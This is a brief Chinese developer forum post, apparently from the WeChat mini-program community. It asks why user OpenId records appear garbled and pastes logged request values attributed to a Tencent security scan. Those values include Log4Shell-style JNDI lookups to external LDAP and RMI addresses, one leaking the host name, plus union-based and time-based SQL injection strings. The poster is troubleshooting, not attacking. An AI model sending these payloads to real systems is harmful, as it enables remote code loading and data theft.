这个是微信安全团队的测试 $_GET = [ 'select' => '${jndi:ldap://183.47.120.213:1389/jdk18fdafcc6c9d4e2565049a58624811fb03-/-${hostName}}' ] $_SERVER = [ 'HTTP_USER_AGENT' => 'Tencent Security Team, more information: https://developers.weixin.qq.com/community/minihome/doc/0008ea401c89c02cff2d1345051001 (66a840605d716bd8fc227a37a4db) f6a6'
微信小程序获取用户信息时,OpenId出现乱码,一个用户插入了N条信息出现很多下面的乱码 oPt8w5a7jrXzDoGVQVENoo5GInk4 opt8w5a7jrxzdogvqvenoo5gink4' union 1-- opt8w5a7jrxzdogvqvenoo5gink4' union 1,2-- AND (SELECT*FROM(SELECT(SLEEP(3)))dovm) limi ${jndi:rmi://9.4.131.68:1099/bypass7d616399cd ${jndi:rmi://101.91.62.170:1099/bypass24039a6 ${jndi:ldap://hostname-${hostName}.username-$ ${jndi:ldap://101.91.62.170:1389/jdk1889905e3 ${jndi:ldap://9.4.131.68:1389/jdk18ded425cbb6
08-05